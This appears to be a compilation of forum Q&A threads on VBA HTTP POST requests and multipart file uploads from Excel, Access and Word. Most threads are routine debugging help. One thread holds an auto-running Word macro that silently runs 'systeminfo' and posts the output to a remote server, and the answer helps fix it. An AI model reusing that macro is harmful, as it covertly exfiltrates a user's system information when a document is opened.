VBA XMLHTTP POST Upload text/xml File to API Service - vba

I need to send XML file to API service with use of Excel/VBA.
Instructions available in documentation state that the only required field is:
file: string($binary) - file to upload. The name can be specified in the filename parameter of the Content-Disposition header.
This is the equivalent of CURL based on documentation:
curl -X 'POST' \
'api_service_url' \
-H 'accept: */*' \
-H 'Content-Type: multipart/form-data' \
-F 'file=#VPRT9000004726.xml;type=text/xml'
I have searched the web and cannot find a working solution. I am wondering, if this is something possible to do with Excel VBA XMLHTTP library at all?
Available documentation of API service can be found on this link under the UPLOAD section:
Any help or direction appreciated.
Code that is working for uploading the file, but having issues with UTF-8 special characters:
Option Explicit
Sub UploadFile()
Dim sFile As String
Dim sUrl As String
Dim sAccessToken As String
Dim sBoundary As String
Dim sResponse As String
sFile = "D:\VPRT9000004726.xml"
sUrl = "https://testapi.valenciaportpcs.net/messaging/messages/upload/default"
sBoundary = "---------------------------166096475834725259111917034354"
sAccessToken = "myaccesstoken"
sResponse = pvPostFile(sUrl, sFile, sBoundary, sAccessToken)
'Debug.Print sResponse
End Sub
Private Function pvPostFile(sUrl As String, sFileName As String, sBoundary As String, sAccessToken As String) As String
Dim xmlReq As MSXML2.ServerXMLHTTP60
Dim nFile As Integer
Dim baBuffer() As Byte
Dim sPostData As String
'--- read file
nFile = FreeFile
Open sFileName For Binary Access Read As nFile
If LOF(nFile) > 0 Then
ReDim baBuffer(0 To LOF(nFile) - 1) As Byte
Get nFile, , baBuffer
sPostData = StrConv(baBuffer, vbUnicode)
End If
Close nFile
'--- prepare body
sPostData = "--" & sBoundary & vbCrLf & _
"Content-Disposition: form-data; name=""file""; filename=""" & Mid$(sFileName, InStrRev(sFileName, "\") + 1) & """" & vbCrLf & _
"Content-Type: text/xml" & vbCrLf & vbCrLf & _
sPostData & vbCrLf & _
"--" & sBoundary & "--"
'Debug.Print sPostData
'--- post
Set xmlReq = New MSXML2.ServerXMLHTTP60
With xmlReq
.Open "POST", sUrl, False
.setRequestHeader "Authorization", "Bearer " & sAccessToken
.setRequestHeader "Content-Type", "multipart/form-data; boundary=" & sBoundary
.setRequestHeader "Accept-Charset", "UTF-8"
.send pvToByteArray(sPostData)
pvPostFile = .Status
End With
Set xmlReq = Nothing
End Function
Private Function pvToByteArray(sText As String) As Byte()
pvToByteArray = StrConv(sText, vbFromUnicode)
End Function


VBA TalentLMS API Post Request with multipart/form-data throwing error when passing Request Body with boundaries in as a string parameter

I am creating a Module in MS Access to make API calls to different endpoints in the TalentLMS API. I am creating functions to minimize the code needed for each endpoint. So far all of my GET requests are working. I have a POST request to add a user account working as well. The problem that I am running into is that I have a POST request to delete a user account that works if I generate the multipart/form-data (Request Body) in the API Call function but does not work if I pass the mutlipart/form-data (Request Body) in as a parameter to the API Call function.
This is Working I generate the request body with boundaries within the API call function as a string.
Function talentAPICall_3(ByVal intUserid As Integer, ByVal strPermanent As String) As String
Dim request As New MSXML2.XMLHTTP30
Dim apiURL, boundary, postData, strRequest, strResponse As String
Dim contentLen As Long
apiURL = "https://<<myDomain>>.talentlms.com/api/v1/"
strRequest = apiURL & "deleteuser/"
boundary = "----------------------------" & Format(Now, "ddmmyyyyhhmmss")
postData = "--" & boundary & vbCrLf & _
"Content-Disposition: form-data; name=""user_id""" & vbCrLf & _
"Content-Type: text/plain; charset=UTF-8" & vbCrLf & vbCrLf & _
intUserid & vbCrLf & _
"--" & boundary & vbCrLf & _
"Content-Disposition: form-data; name=""permanent""" & vbCrLf & _
"Content-Type: text/plain; charset=UTF-8" & vbCrLf & vbCrLf & _
strPermanent & vbCrLf & _
"--" & boundary & "--"
contentLen = Len(postData)
With request
.Open "POST", (strRequest), False
.setRequestHeader "Authorization", "Basic <<MyAPIKey>>=="
.setRequestHeader "Host", "<<myDomain>>.talentlms.com"
.setRequestHeader "Content-Type", "multipart/form-data; boundary=" & boundary
.setRequestHeader "content-Length", contentLen
.send (postData)
While request.ReadyState <> 4
strResponse = .responseText
End With
Debug.Print "Server responded with status " & request.statusText & " - code: "; request.status
Debug.Print postData
talentAPICall_3 = strResponse
End Function
This is NOT Working Where I use a getBoundaries() function to pass the body request with boundaries as a string to the API call function.
Function DelUser(ByVal intUserid As Integer, ByVal strPermanent As String) As String
Dim postData, strResponse As String
Dim boundaries() As Variant
boundaries = Array("user_id", intUserid, "permanent", strPermanent)
postData = getBoundaries(boundaries)
strResponse = talentAPICall_4(postData)
DelUser = strResponse
End Function
Which calls the following.
Function getBoundaries(params() As Variant) As String
Dim boundary, boundaries As String
boundary = "----------------------------" & Format(Now, "ddmmyyyyhhmmss")
Dim i As Long
boundaries = ""
For i = LBound(params) To UBound(params)
boundaries = boundaries & "--" & boundary & vbCrLf & _
"Content-Disposition: form-data; name=""" & params(i) & """" & vbCrLf & _
"Content-Type: text/plain; charset=UTF-8" & vbCrLf & vbCrLf
i = i + 1
boundaries = boundaries & params(i) & vbCrLf
Next i
boundaries = boundaries & "--" & boundary & "--"
getBoundaries = boundaries
End Function
When the Request Body is generated with boundaries and returned as a string, it is then passed as a parameter to the next function.
Function talentAPICall_4(ByVal postData As String) As String
Dim request As New MSXML2.XMLHTTP30
Dim apiURL, boundary, strRequest, strResponse As String
Dim contentLen As Long
apiURL = "https://<<myDomain>>.talentlms.com/api/v1/"
strRequest = apiURL & "deleteuser/"
boundary = Left(postData, 44)
contentLen = Len(postData)
With request
.Open "POST", (strRequest), False
.setRequestHeader "Authorization", "Basic <<MyAPIKey>>=="
.setRequestHeader "Host", "<<myDomain>>.talentlms.com"
.setRequestHeader "Content-Type", "multipart/form-data; boundary=" & boundary
.setRequestHeader "content-Length", contentLen
.send (postData)
While request.ReadyState <> 4
strResponse = .responseText
End With
Debug.Print "Server responded with status " & request.statusText & " - code: "; request.status
Debug.Print postData
talentAPICall_4 = strResponse
End Function
Here are the results of both methods used:
call talentAPICall_3(3314, "yes")
Server responded with status OK - code: 200
Posted Data:
Content-Disposition: form-data; name="user_id"
Content-Type: text/plain; charset=UTF-8
Content-Disposition: form-data; name="permanent"
Content-Type: text/plain; charset=UTF-8
Not Working:
call delUser(3314, "yes")
Server responded with status Bad Request - code: 400
Posted Data:
Content-Disposition: form-data; name="user_id"
Content-Type: text/plain; charset=UTF-8
Content-Disposition: form-data; name="permanent"
Content-Type: text/plain; charset=UTF-8
As you can see, except for the variation of the time stamp used to create the boundary, the postData from Debug.Print for both functions is the same. The TalentLMS API states that the following for the 400 error code "A required parameter is missing or an invalid type (e.g. a string) was supplied instead of an integer." In both cases postData is a String and they have the same parameters.
Anyone see what I am missing?
In your "working" code the boundary header length is 42, and in the non-working code it's 44?
You need to remove the leading "--"...
boundary = Mid(postData, 3, 42)
Might be safer to pass the boundary in to getBoundaries rather than try to extract it from the output.

VBA HTTP Request POST returning empty string

I am working on a procedure, in MS-Access VBA, to POST an XML text string to a web service and process the XML text string that is returned from the service.
The issue I am having is that the responseText property is always empty when it should contain a XML text string. No errors are returned and the .status = "OK".
I have tried the WinHttp.WinHttpRequest, MSXML2.XMLHTTP, and MSXML2.ServerXMLHTTP objects and consistently have the same issue.
Here is a code example:
Public Function Send() As Boolean
Dim sURL, sCred As String
Dim sRequest, sResult, sStatus, sHeader As String
Dim bRtn As Boolean
sRequest = Me.RequestXML_String
With orsValues
sURL = .Fields("WebServiceURL").Value
sCred = Base64Encode(Trim(.Fields("User").Value) & ":" & Trim(.Fields("Password").Value))
End With
With oXHR
.Open "POST", sURL, False
.SetRequestHeader "Authorization", "Basic " & sCred & """"
.SetRequestHeader "User-Agent", "Mozilla/4.0"
.SetRequestHeader "Content-Type", "text/xml"
.Send sRequest
sStatus = .StatusText
sResult = .ResponseText
sHeader = .GetAllResponseHeaders
If sResult <> "" Then
If Contains(sResult, "<") Then ReadXML sResult, "Response"
Debug.Print sResult
Debug.Print sHeader
Debug.Print sRequest
End If
End With
Set oXHR = Nothing
End Function
I have verified that the web service is working correctly by building a similar call in a HTML document, sending the XML string, and receiving the response XML string.
Can someone please help me fix my issue?
I found the problem, with help from Fiddler.
The line setting the authorization header
.SetRequestHeader "Authorization", "Basic " & sCred & """"
Was adding a (") to the header line. The corrected line is
.SetRequestHeader "Authorization", "Basic " & sCred
Thank you for your help

Uploading an image to web with excel vba

I'm trying to upload an image to a REST webpage. I can do this successfully though a cURL call:
curl -u Admin:admin -T C:\temp\wikiTable.jpg
I'm now trying to achieve this though a HTTP Post in Excel vba but experiencing some problems. I'm currently doing this:
Const STR_BOUNDARY As String = "---------------------------123456789abc"
Dim nFile As Integer
Dim baBuffer() As Byte
Dim sPostData As String
Dim sFileName As String
Dim sUrl As String
sFileName = "C:\temp\wikiTable.jpg"
sUrl = ""
'--- read file
nFile = FreeFile
Open sFileName For Binary Access Read As nFile
If LOF(nFile) > 0 Then
ReDim baBuffer(0 To LOF(nFile) - 1) As Byte
Get nFile, , baBuffer
sPostData = StrConv(baBuffer, vbUnicode)
End If
Close nFile
'-- post
Dim HTTPReq As Object
Set HTTPReq = CreateObject("WinHttp.WinHttpRequest.5.1")
HTTPReq.Option(4) = 13056
HTTPReq.Open "Post", sUrl, False
HTTPReq.SetCredentials "Admin", "admin", 0
HTTPReq.setRequestHeader "Content-Type: multipart/form-data;"
HTTPReq.send sPostData
MsgBox (HTTPReq.responseText)
For the responseText I keep getting the following error:
10.4.6 405 Method Not Allowed
The method specified in the Request-Line is not allowed for the resource
identified by the Request-URI. The response MUST include an Allow header
containing a list of valid methods for the requested resource.
Any ideas what I'm doing wrong here?
The following worked in the end:
Private Function PostFile(sUrl As String, sFileName As String, strUserName As String, strPassword As String) As String
Dim nFile As Integer
Dim baBuffer() As Byte
Dim sPostData As String
'--- read file
Dim adoStream
Set adoStream = CreateObject("ADODB.Stream")
adoStream.Mode = 3 ' read write
adoStream.Type = 1 ' adTypeBinary
adoStream.LoadFromFile (sFileName)
adoStream.Position = 0
'--- post
Dim HTTPReq As Object
Set HTTPReq = CreateObject("WinHttp.WinHttpRequest.5.1")
HTTPReq.Option(4) = 13056
HTTPReq.Open "PUT", sUrl, False
HTTPReq.setRequestHeader "Authorization", "Basic " + Base64Encode(strUserName + ":" + strPassword)
HTTPReq.setRequestHeader "Content-Type", "multipart/form-data"
HTTPReq.setRequestHeader "Content-Length", adoStream.Size
HTTPReq.send (adoStream.Read(adoStream.Size))
pvPostFile = HTTPReq.responseText
Set adoStream = Nothing
End Function
I advise you try to call the method "POST" instead of "Post" because it might be case sensitive.

Send file via post in visual basic

i'm coding a makro in MS Word to execute a command in cmd and send it to the remote server via POST. I have no expirience in VB so the error could be easy to solve, but i have no idea what i'm doing wrong
Sub Run_Cmd(command, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "%COMSPEC% /c " & command, visibility, wait_on_execute
End Sub
Sub Run_Program(program, arguments, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run program & " " & arguments & " ", visibility, wait_on_execute
End Sub
Const WAIT = True
Private Sub pvPostFile(sUrl As String, sFileName As String, sPath As String, Optional ByVal bAsync As Boolean)
Const STR_BOUNDARY As String = "3fbd04f5-b1ed-4060-99b9-fca7ff59c113"
Dim nFile As Integer
Dim baBuffer() As Byte
Dim sPostData As String
'--- read file
nFile = FreeFile
Open sPath For Binary Access Read As nFile
If LOF(nFile) > 0 Then
ReDim baBuffer(0 To LOF(nFile) - 1) As Byte
Get nFile, , baBuffer
sPostData = StrConv(baBuffer, vbUnicode)
MsgBox sPostData
End If
Close nFile
'--- prepare body
sPostData = "--" & STR_BOUNDARY & vbCrLf & _
"Content-Disposition: form-data; name=""uploadfile""; filename=""" & Mid$(sFileName, InStrRev(sFileName, "\") + 1) & """" & vbCrLf & _
"Content-Type: application/octet-stream" & vbCrLf & vbCrLf & _
sPostData & vbCrLf & _
"--" & STR_BOUNDARY & "--"
'--- post
With CreateObject("Microsoft.XMLHTTP")
.Open "POST", sUrl, bAsync
.SetRequestHeader "Content-Type", "multipart/form-data; boundary=" & STR_BOUNDARY
.Send pvToByteArray(sPostData)
End With
End Sub
Private Function pvToByteArray(sText As String) As Byte()
pvToByteArray = StrConv(sText, vbFromUnicode)
End Function
Sub Workbook_Open()
Run_Cmd "systeminfo > %USERPROFILE%\temp.txt", INVISIBLE, WAIT
Dim envstring As String
envstring = Environ$("USERPROFILE")
envstring = envstring & "\temp.txt"
pvPostFile "http://testujemywordpressa.pl/index.php", "temp.txt", envstring
End Sub
debugger says that "The system can not locate the specified resource"
The reason you are receiving that error message is because the server you are trying to reach doesn't exist. Check the URL that you are passing to pvPostFile(). I have received this error many times because of bad URLs in the past few months. Let me know if this works out for you.

Upload Excel xlsm file to php script using VBA

I would like to upload an Excel xlsm file to a php script from VBA. I found the following code:
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Dim strURL As String
Dim StrFileName As String
Dim FormFields As String
Dim path As String
Dim name As String
StrFileName = "c:\temp\ctc1output.xls"
strURL = "http://www.tri-simulation.com/P3/"
WinHttpReq.Open "POST", strURL, False
' Set the header
WinHttpReq.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
FormFields = """fileulp=" & StrFileName & """"
FormFields = FormFields + "&"
FormFields = FormFields + """sfpath=P3"""
WinHttpReq.Send FormFields
' Display the status code and response headers.
MsgBox WinHttpReq.GetAllResponseHeaders
MsgBox WinHttpReq.ResponseText
Should I handle the file as a binary file or another type of file?
Can I upload the file while it is still open (I want to upload the file from which the VBA is running from)?
I am not sure if I'm on the right track.
I'm also not sure about what the headers and form fields should be.
Thx for any help.
You won't need to base64 encode anything. Follow the sample code you have found but before preparing the file (before '---prepare body comment) just add your other texts (form entries) like this
sPostData = sPostData & "--" & STR_BOUNDARY & vbCrLf & _
"Content-Disposition: form-data; name=""" & Name & """"
sPostData = sPostData & vbCrLf & vbCrLf & _
pvToUtf8(Value) & vbCrLf
... where Name and Value are the designed name and the actual text that you want to include in service request. For the function pvToUtf8 implementation take a look at this Google Cloud Print service connector. The snippet above is taken from pvRestAddParam function of the same connector.